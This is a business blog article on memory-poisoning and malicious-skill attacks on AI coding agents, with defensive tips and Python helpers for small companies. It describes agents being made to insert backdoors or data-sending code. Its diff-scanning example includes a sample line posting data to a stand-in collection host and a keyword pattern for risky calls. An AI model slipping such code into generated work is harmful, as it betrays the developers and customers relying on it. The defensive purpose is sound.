Your Company’s AI Coding Tools: Who Is Validating Them?
GitHub Copilot, Cursor, Cline. The use of AI coding agents in development environments is rapidly increasing. Automatic code generation, bug fixing, refactoring—productivity is indeed on the rise. One survey even reported that the introduction of AI coding tools improved development speed by as much as 55%.
However, lurking behind this convenience is a risk that could critically endanger small businesses.
“Memory poisoning” and “malicious skill attacks” are attack methods that inject poison into the memory and extensions of AI coding agents, contaminating the code they generate. Recent research has revealed that this threat is no longer just theoretical but has reached a demonstrable level.
For small businesses that lack dedicated security personnel, this is a problem that cannot simply be brushed aside as “unknown.”
What Is Happening—Two Attack Methods
Memory Poisoning: Rewriting the AI’s ‘Memory’
Many AI coding agents retain past interactions and settings as memory. Memory poisoning is a method that injects malicious data into this memory, embedding backdoors or vulnerabilities in the code generated by the AI.
Developers trust the code generated by the AI as “usual output.” But what if a line of code that sends data externally is hidden within? What if there is logic that bypasses authentication? Would it be caught during code review?
To be honest, in environments without dedicated security engineers, the chances of such code slipping through undetected are high.
Malicious Skill Attacks: Extensions as Backdoors
AI coding agents can be enhanced with “skills” or “plugins” developed by third parties. This is similar to the app store model for smartphones. By simply installing convenient extensions, new functionalities can be utilized.
The problem is that these skills can possess system-level permissions. Reading and writing files, sending network requests, accessing environment variables—if the necessary permissions for legitimate functions are exploited by malicious developers, it can become a pathway for intrusion into the company’s IT infrastructure.
Recent research reported generating 1,110 hostile skills, of which 11.6% to 33.5% bypassed security reviews. In other words, roughly 1 to 3 out of every 10 malicious skills could slip through the review process and be published.
Why This Is Especially Dangerous for Small Businesses
Large corporations have security teams that audit code and establish review processes for the introduction of third-party tools. But what is the reality for small businesses?
- Developers: 1 to 3. Security personnel: Zero.
- Code reviews are either non-existent or merely a formality.
- Plugins are installed simply because they seem convenient.
- There is no incident response plan.
What would happen if an attack occurred in this state?
Customer data leaks. Obligations to report under personal information protection laws, notifications to customers, loss of trust. For small businesses, a decrease in customer retention can lead to a revenue drop of 10% to 20% of annual sales. For a company with annual sales of 50 million yen, that translates to a loss of 5 to 10 million yen.
System downtime. If infected by ransomware, the average recovery time is 23 days (according to IBM). When combined with lost sales during that period, recovery costs, and preventive measures, the total can reach several million yen even for small businesses.
Legal liability. If there are vulnerabilities in systems handling customer data, the excuse “I didn’t know because the code was generated by AI” will not hold up. The responsibility lies with the company.
Four Defensive Measures You Can Start Today
You don’t need to make significant security investments. Start with the following four steps.
1. Take Inventory of Third-Party Skills
List all the skills and plugins currently installed in your AI coding tools. For each one, check “who created it,” “when it was installed,” and “is it really necessary?” Immediately remove anything unnecessary. This will take 1 to 2 hours and cost nothing.
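An inventory like this can even be partially automated. The sketch below assumes a VS Code-style layout where each extension lives in its own directory (e.g. `~/.vscode/extensions`); the directory name and path used in the demo are hypothetical, and the install date is approximated from the directory's modification time.

```python
import datetime
import tempfile
from pathlib import Path

def inventory_extensions(ext_dir: Path) -> list[dict]:
    """List each installed extension with its approximate install
    date, taken from the extension directory's modification time."""
    items = []
    for entry in sorted(ext_dir.iterdir()):
        if entry.is_dir():
            installed = datetime.date.fromtimestamp(entry.stat().st_mtime)
            items.append({"name": entry.name, "installed": installed.isoformat()})
    return items

# Demo: a temporary directory stands in for the real extensions folder.
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "some-publisher.handy-skill-1.0.0").mkdir()
    report = inventory_extensions(Path(tmp))

for item in report:
    print(f"{item['name']}  installed: {item['installed']}")
```

Run it against your real extensions folder, paste the output into a spreadsheet, and add the "who created it" and "is it really necessary?" columns by hand.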
2. Enforce a “Trusted Sources Only” Rule
Establish a minimum review process before introducing any skill. Install only skills from the official marketplace that have a rating of 4 stars or higher, more than 1,000 downloads, and a clearly identified developer. Summarize this rule on a single sheet of paper and share it with all developers.
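The rule is simple enough to encode as a checklist function. This is only a sketch of the article's thresholds; the field names and example skill records are hypothetical, and real marketplaces expose this metadata in their own formats.

```python
def meets_trust_bar(skill: dict) -> bool:
    """Apply the article's minimum bar: official marketplace only,
    rating >= 4.0, more than 1,000 downloads, a named developer."""
    return (
        skill.get("source") == "official-marketplace"
        and skill.get("rating", 0) >= 4.0
        and skill.get("downloads", 0) > 1000
        and bool(skill.get("developer"))
    )

candidate = {"source": "official-marketplace", "rating": 4.5,
             "downloads": 12000, "developer": "ExampleCorp"}
shady = {"source": "random-gist", "rating": 5.0,
         "downloads": 40, "developer": ""}

print(meets_trust_bar(candidate))  # True
print(meets_trust_bar(shady))      # False
```

Note that the `shady` example fails despite its 5-star rating: a high score with few downloads and no named developer is exactly the profile the rule is meant to filter out.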
3. Make ‘Diff Reviews’ of AI-Generated Code a Habit
Do not merge code generated or modified by AI without reviewing the differences. Always check the diffs, especially in areas related to network communication, file operations, and authentication processes. Perfection is not necessary; just having the habit of looking can help detect obvious anomalies.
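A lightweight way to build this habit is to pre-filter diffs for the risky areas the article names before a human looks at them. The keyword list below is an illustrative heuristic, not an exhaustive detector, and the sample diff is invented for the demo.

```python
import re

# Rough heuristic: flag added lines touching network, process,
# environment, file, or authentication-related code.
RISK_PATTERNS = re.compile(
    r"\b(requests|urllib|socket|subprocess|eval|exec|"
    r"os\.environ|auth|token|password)\b|open\(",
    re.IGNORECASE,
)

def flag_risky_lines(diff_text: str) -> list[str]:
    """Return added lines (+) in a unified diff that match a risk keyword."""
    flagged = []
    for line in diff_text.splitlines():
        if line.startswith("+") and not line.startswith("+++"):
            if RISK_PATTERNS.search(line):
                flagged.append(line)
    return flagged

diff = """\
+import requests
+def save(data):
+    requests.post("http://example.com/collect", json=data)
+    return True
"""

flagged = flag_risky_lines(diff)
for line in flagged:
    print("REVIEW:", line)
```

A hit does not mean the code is malicious; it only means that line deserves a deliberate look instead of a reflexive merge.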
4. Hold a Monthly ’15-Minute Security Meeting’
Once a month, set aside 15 minutes for the development team to share “recent security-related news.” This includes vulnerability information about AI coding tools, new attack methods, and incidents affecting other companies. Just being aware of this information can help prevent attacks.
‘Convenience’ and ‘Danger’ Enter Through the Same Door
AI coding tools can dramatically enhance the development capabilities of small businesses. Even with a small team, there is potential to develop at speeds comparable to large corporations. To maximize these benefits, it is essential to understand the risks correctly.
The notion that “we are too small to be targeted” is a fantasy. Attackers do not discriminate by size; rather, small businesses with weaker defenses become prime targets.
This is not an argument against using AI coding tools; they should be used. But never forget the principle that AI-generated code requires the same level of scrutiny as human-written code, if not more.
The moment you become intoxicated by convenience and neglect validation, the ‘poison’ of AI code begins to quietly spread within your organization.
Points of Attention Going Forward
Discussions about the security of AI coding agents will accelerate through the latter half of 2025. Major platforms are moving towards stricter review standards for skills, but the evolution of attack methods shows no signs of stopping. Of particular concern is the security in “multi-agent environments” where AI agents collaborate. When Agent A generates code that Agent B executes, who is responsible when poison enters that chain? There is still no answer to this question.
The best strategy for small businesses is simple: Conduct an inventory of existing tools today. This is the most cost-effective security measure.